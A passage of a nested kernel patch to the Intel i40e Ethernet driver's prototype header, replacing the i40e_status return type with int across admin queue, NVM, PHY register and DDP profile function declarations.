+-				bool default_port, u16 *pveb_seid,
+-				bool enable_stats,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_veb_parameters(struct i40e_hw *hw,
+-				u16 veb_seid, u16 *switch_id, bool *floating,
+-				u16 *statistic_index, u16 *vebs_used,
+-				u16 *vebs_free,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_macvlan(struct i40e_hw *hw, u16 vsi_id,
++int i40e_aq_add_vsi(struct i40e_hw *hw,
++		    struct i40e_vsi_context *vsi_ctx,
++		    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
++			      u16 vsi_id, bool set_filter,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
++					u16 vsi_id, bool set,
++					struct i40e_asq_cmd_details *cmd_details,
++					bool rx_only_promisc);
++int i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
++					  u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable, u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
++				 u16 seid, bool enable,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_vsi_params(struct i40e_hw *hw,
++			   struct i40e_vsi_context *vsi_ctx,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_update_vsi_params(struct i40e_hw *hw,
++			      struct i40e_vsi_context *vsi_ctx,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
++		    u16 downlink_seid, u8 enabled_tc,
++		    bool default_port, u16 *pveb_seid,
++		    bool enable_stats,
++		    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_veb_parameters(struct i40e_hw *hw,
++			       u16 veb_seid, u16 *switch_id, bool *floating,
++			       u16 *statistic_index, u16 *vebs_used,
++			       u16 *vebs_free,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_macvlan(struct i40e_hw *hw, u16 vsi_id,
+ 			struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 			u16 count, struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
+-i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+-		       struct i40e_aqc_add_macvlan_element_data *mv_list,
+-		       u16 count, struct i40e_asq_cmd_details *cmd_details,
+-		       enum i40e_admin_queue_err *aq_status);
+-i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 vsi_id,
+-			struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			u16 count, struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
+-i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+-			  struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			  u16 count, struct i40e_asq_cmd_details *cmd_details,
+-			  enum i40e_admin_queue_err *aq_status);
+-i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rule_id, u16 *rules_used, u16 *rules_free);
+-i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rules_used, u16 *rules_free);
++int i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
++			   struct i40e_aqc_add_macvlan_element_data *mv_list,
++			   u16 count, struct i40e_asq_cmd_details *cmd_details,
++			   enum i40e_admin_queue_err *aq_status);
++int i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 vsi_id,
++			   struct i40e_aqc_remove_macvlan_element_data *mv_list,
++			   u16 count, struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
++			      struct i40e_aqc_remove_macvlan_element_data *mv_list,
++			      u16 count, struct i40e_asq_cmd_details *cmd_details,
++			      enum i40e_admin_queue_err *aq_status);
++int i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			   u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
++			   struct i40e_asq_cmd_details *cmd_details,
++			   u16 *rule_id, u16 *rules_used, u16 *rules_free);
++int i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			      u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rules_used, u16 *rules_free);
+ 
+-i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+-				u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+-				struct i40e_aqc_get_switch_config_resp *buf,
+-				u16 buf_size, u16 *start_seid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+-						u16 flags,
+-						u16 valid_flags, u8 mode,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				enum i40e_aq_resource_access_type access,
+-				u8 sdp_number, u64 *timeout,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				u8 sdp_number,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			      u32 offset, u16 length, bool last_command,
++int i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
++			   u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_switch_config(struct i40e_hw *hw,
++			      struct i40e_aqc_get_switch_config_resp *buf,
++			      u16 buf_size, u16 *start_seid,
+ 			      struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_discover_capabilities(struct i40e_hw *hw,
+-				void *buff, u16 buff_size, u16 *data_size,
+-				enum i40e_admin_queue_opc list_type_opc,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command, u8 preservation_flags,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_rearrange_nvm(struct i40e_hw *hw,
+-				  u8 rearrange_nvm,
+-				  struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+-				u8 mib_type, void *buff, u16 buff_size,
+-				u16 *local_len, u16 *remote_len,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
+-i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+-		     u8 mib_type, void *buff, u16 buff_size,
+-		     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+-				bool enable_update,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
+-i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
++int i40e_aq_set_switch_config(struct i40e_hw *hw,
++			      u16 flags,
++			      u16 valid_flags, u8 mode,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_request_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     enum i40e_aq_resource_access_type access,
++			     u8 sdp_number, u64 *timeout,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_release_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     u8 sdp_number,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
++		     u32 offset, u16 length, void *data,
++		     bool last_command,
+ 		     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+-			      bool persist,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_dcb_parameters(struct i40e_hw *hw,
+-				       bool dcb_enable,
+-				       struct i40e_asq_cmd_details
+-				       *cmd_details);
+-i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++int i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
++		      u32 offset, u16 length, bool last_command,
++		      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_discover_capabilities(struct i40e_hw *hw,
++				  void *buff, u16 buff_size, u16 *data_size,
++				  enum i40e_admin_queue_opc list_type_opc,
++				  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
++		       u32 offset, u16 length, void *data,
++		       bool last_command, u8 preservation_flags,
++		       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rearrange_nvm(struct i40e_hw *hw,
++			  u8 rearrange_nvm,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 u16 *local_len, u16 *remote_len,
++			 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_lldp_mib(struct i40e_hw *hw,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
++				      bool enable_update,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
++			 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
++		      bool persist,
++		      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_dcb_parameters(struct i40e_hw *hw,
++			       bool dcb_enable,
+ 			       struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+-				       void *buff, u16 buff_size,
+-				       struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+-				u16 udp_port, u8 protocol_index,
+-				u8 *filter_index,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+-				    u16 flags, u8 *mac_addr,
+-				    struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
++int i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++		       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
++			       void *buff, u16 buff_size,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
++			   u16 udp_port, u8 protocol_index,
++			   u8 *filter_index,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_mac_address_write(struct i40e_hw *hw,
++			      u16 flags, u8 *mac_addr,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+ 				u16 seid, u16 credit, u8 max_credit,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_bw_limit(struct i40e_hw *hw,
+-				u16 seid, u16 credit, u8 max_bw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw, u16 seid,
+-			struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++int i40e_aq_dcb_updated(struct i40e_hw *hw,
+ 			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
+-		enum i40e_admin_queue_opc opcode,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+-	u16 seid,
+-	struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
+-	struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_port_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_resume_port_tx(struct i40e_hw *hw,
++int i40e_aq_config_switch_comp_bw_limit(struct i40e_hw *hw,
++					u16 seid, u16 credit, u8 max_bw,
++					struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw, u16 seid,
++			     struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
++				   u16 seid,
++				   struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
++				   enum i40e_admin_queue_opc opcode,
+ 				   struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
+-i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+-			     struct i40e_aqc_cloud_filters_element_bb *filters,
+-			     u8 filter_count);
+-enum i40e_status_code
+-i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 vsi,
+-			  struct i40e_aqc_cloud_filters_element_data *filters,
+-			  u8 filter_count);
+-enum i40e_status_code
+-i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 vsi,
+-			  struct i40e_aqc_cloud_filters_element_data *filters,
+-			  u8 filter_count);
+-enum i40e_status_code
+-i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+-			     struct i40e_aqc_cloud_filters_element_bb *filters,
+-			     u8 filter_count);
+-i40e_status i40e_read_lldp_cfg(struct i40e_hw *hw,
+-			       struct i40e_lldp_variables *lldp_cfg);
+-enum i40e_status_code
+-i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+-			struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
++					 u16 seid,
++					 struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
++					 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
++				u16 seid,
++				struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
++				     u16 seid,
++				     struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
++				     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
++					 u16 seid,
++					 struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
++					 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_port_ets_config(struct i40e_hw *hw,
++				  u16 seid,
++				  struct i40e_aqc_query_port_ets_config_resp *bw_data,
++				  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
++					u16 seid,
++					struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
++					struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_resume_port_tx(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
++				 struct i40e_aqc_cloud_filters_element_bb *filters,
++				 u8 filter_count);
++int i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 vsi,
++			      struct i40e_aqc_cloud_filters_element_data *filters,
++			      u8 filter_count);
++int i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 vsi,
++			      struct i40e_aqc_cloud_filters_element_data *filters,
++			      u8 filter_count);
++int i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
++				 struct i40e_aqc_cloud_filters_element_bb *filters,
++				 u8 filter_count);
++int i40e_read_lldp_cfg(struct i40e_hw *hw, struct i40e_lldp_variables *lldp_cfg);
++int i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details);
+ /* i40e_common */
+-i40e_status i40e_init_shared_code(struct i40e_hw *hw);
+-i40e_status i40e_pf_reset(struct i40e_hw *hw);
++int i40e_init_shared_code(struct i40e_hw *hw);
++int i40e_pf_reset(struct i40e_hw *hw);
+ void i40e_clear_hw(struct i40e_hw *hw);
+ void i40e_clear_pxe_mode(struct i40e_hw *hw);
+-i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up);
+-i40e_status i40e_update_link_info(struct i40e_hw *hw);
+-i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
+-i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+-				      u32 *max_bw, u32 *min_bw, bool *min_valid,
+-				      bool *max_valid);
+-i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+-			struct i40e_aqc_configure_partition_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
+-i40e_status i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
+-				 u32 pba_num_size);
+-i40e_status i40e_validate_mac_addr(u8 *mac_addr);
++int i40e_get_link_status(struct i40e_hw *hw, bool *link_up);
++int i40e_update_link_info(struct i40e_hw *hw);
++int i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
++int i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
++			      u32 *max_bw, u32 *min_bw, bool *min_valid,
++			      bool *max_valid);
++int i40e_aq_configure_partition_bw(struct i40e_hw *hw,
++				   struct i40e_aqc_configure_partition_bw_data *bw_data,
++				   struct i40e_asq_cmd_details *cmd_details);
++int i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
++int i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num, u32 pba_num_size);
++int i40e_validate_mac_addr(u8 *mac_addr);
+ void i40e_pre_tx_queue_cfg(struct i40e_hw *hw, u32 queue, bool enable);
+ /* prototype for functions used for NVM access */
+-i40e_status i40e_init_nvm(struct i40e_hw *hw);
+-i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
+-				      enum i40e_aq_resource_access_type access);
++int i40e_init_nvm(struct i40e_hw *hw);
++int i40e_acquire_nvm(struct i40e_hw *hw, enum i40e_aq_resource_access_type access);
+ void i40e_release_nvm(struct i40e_hw *hw);
+-i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+-					 u16 *data);
+-enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+-						u8 module_ptr,
+-						u16 module_offset,
+-						u16 data_offset,
+-						u16 words_data_size,
+-						u16 *data_ptr);
+-i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+-				 u16 *words, u16 *data);
+-i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw);
+-i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+-						 u16 *checksum);
+-i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+-				struct i40e_nvm_access *cmd,
+-				u8 *bytes, int *);
++int i40e_read_nvm_word(struct i40e_hw *hw, u16 offset, u16 *data);
++int i40e_read_nvm_module_data(struct i40e_hw *hw,
++			      u8 module_ptr,
++			      u16 module_offset,
++			      u16 data_offset,
++			      u16 words_data_size,
++			      u16 *data_ptr);
++int i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset, u16 *words, u16 *data);
++int i40e_update_nvm_checksum(struct i40e_hw *hw);
++int i40e_validate_nvm_checksum(struct i40e_hw *hw, u16 *checksum);
++int i40e_nvmupd_command(struct i40e_hw *hw,
++			struct i40e_nvm_access *cmd,
++			u8 *bytes, int *);
+ void i40e_nvmupd_check_wait_event(struct i40e_hw *hw, u16 opcode,
+ 				  struct i40e_aq_desc *desc);
+ void i40e_nvmupd_clear_wait_state(struct i40e_hw *hw);
+ void i40e_set_pci_config_data(struct i40e_hw *hw, u16 link_status);
+ 
+-i40e_status i40e_set_mac_type(struct i40e_hw *hw);
++int i40e_set_mac_type(struct i40e_hw *hw);
+ 
+ extern struct i40e_rx_ptype_decoded i40e_ptype_lookup[];
+ 
+@@ -419,41 +402,41 @@ i40e_virtchnl_link_speed(enum i40e_aq_link_speed link_speed)
+ /* i40e_common for VF drivers*/
+ void i40e_vf_parse_hw_config(struct i40e_hw *hw,
+ 			     struct virtchnl_vf_resource *msg);
+-i40e_status i40e_vf_reset(struct i40e_hw *hw);
+-i40e_status i40e_aq_send_msg_to_pf(struct i40e_hw *hw,
+-				enum virtchnl_ops v_opcode,
+-				i40e_status v_retval,
+-				u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings);
+-i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+-				u8 *mac_addr, u16 ethtype, u16 flags,
+-				u16 vsi_seid, u16 queue, bool is_add,
+-				struct i40e_control_filter_stats *stats,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+-			       u8 table_id, u32 start_index, u16 buff_size,
+-			       void *buff, u16 *ret_buff_size,
+-			       u8 *ret_next_table, u32 *ret_next_index,
+-			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_vf_reset(struct i40e_hw *hw);
++int i40e_aq_send_msg_to_pf(struct i40e_hw *hw,
++			   enum virtchnl_ops v_opcode,
++			   int v_retval,
++			   u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_set_filter_control(struct i40e_hw *hw,
++			    struct i40e_filter_control_settings *settings);
++int i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
++					  u8 *mac_addr, u16 ethtype, u16 flags,
++					  u16 vsi_seid, u16 queue, bool is_add,
++					  struct i40e_control_filter_stats *stats,
++					  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
++		       u8 table_id, u32 start_index, u16 buff_size,
++		       void *buff, u16 *ret_buff_size,
++		       u8 *ret_next_table, u32 *ret_next_index,
++		       struct i40e_asq_cmd_details *cmd_details);
+ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+ 						    u16 vsi_seid);
+-i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details);
+ u32 i40e_read_rx_ctl(struct i40e_hw *hw, u32 reg_addr);
+-i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
++				  u32 reg_addr, u32 reg_val,
++				  struct i40e_asq_cmd_details *cmd_details);
+ void i40e_write_rx_ctl(struct i40e_hw *hw, u32 reg_addr, u32 reg_val);
+-enum i40e_status_code
++int
+ i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+ 			     u8 phy_select, u8 dev_addr, bool page_change,
+ 			     bool set_mdio, u8 mdio_num,
+ 			     u32 reg_addr, u32 reg_val,
+ 			     struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int
+ i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+ 			     u8 phy_select, u8 dev_addr, bool page_change,
+ 			     bool set_mdio, u8 mdio_num,
+@@ -466,43 +449,43 @@ i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+ #define i40e_aq_get_phy_register(hw, ps, da, pc, ra, rv, cd)		\
+ 	i40e_aq_get_phy_register_ext(hw, ps, da, pc, false, 0, ra, rv, cd)
+ 
+-i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+-					    u16 reg, u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+-					     u16 reg, u8 phy_addr, u16 value);
+-i40e_status i40e_read_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 value);
+-i40e_status i40e_read_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
+-				   u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
+-				    u8 phy_addr, u16 value);
++int i40e_read_phy_register_clause22(struct i40e_hw *hw,
++				    u16 reg, u8 phy_addr, u16 *value);
++int i40e_write_phy_register_clause22(struct i40e_hw *hw,
++				     u16 reg, u8 phy_addr, u16 value);
++int i40e_read_phy_register_clause45(struct i40e_hw *hw,
++				    u8 page, u16 reg, u8 phy_addr, u16 *value);
++int i40e_write_phy_register_clause45(struct i40e_hw *hw,
++				     u8 page, u16 reg, u8 phy_addr, u16 value);
++int i40e_read_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
++			   u8 phy_addr, u16 *value);
++int i40e_write_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
++			    u8 phy_addr, u16 value);
+ u8 i40e_get_phy_address(struct i40e_hw *hw, u8 dev_num);
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval);
+-i40e_status i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+-			      u16 buff_size, u32 track_id,
+-			      u32 *error_offset, u32 *error_info,
+-			      struct i40e_asq_cmd_details *
+-			      cmd_details);
+-i40e_status i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
+-				 u16 buff_size, u8 flags,
+-				 struct i40e_asq_cmd_details *
+-				 cmd_details);
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval);
++int i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
++		      u16 buff_size, u32 track_id,
++		      u32 *error_offset, u32 *error_info,
++		      struct i40e_asq_cmd_details *
++		      cmd_details);
++int i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
++			 u16 buff_size, u8 flags,
++			 struct i40e_asq_cmd_details *
++			 cmd_details);
+ struct i40e_generic_seg_header *
+ i40e_find_segment_in_package(u32 segment_type,
+ 			     struct i40e_package_header *pkg_header);
+ struct i40e_profile_section_header *
+ i40e_find_section_in_profile(u32 section_type,
+ 			     struct i40e_profile_segment *profile);
+-enum i40e_status_code
++int
+ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *i40e_seg,
+ 		   u32 track_id);
+-enum i40e_status_code
++int
+ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *i40e_seg,
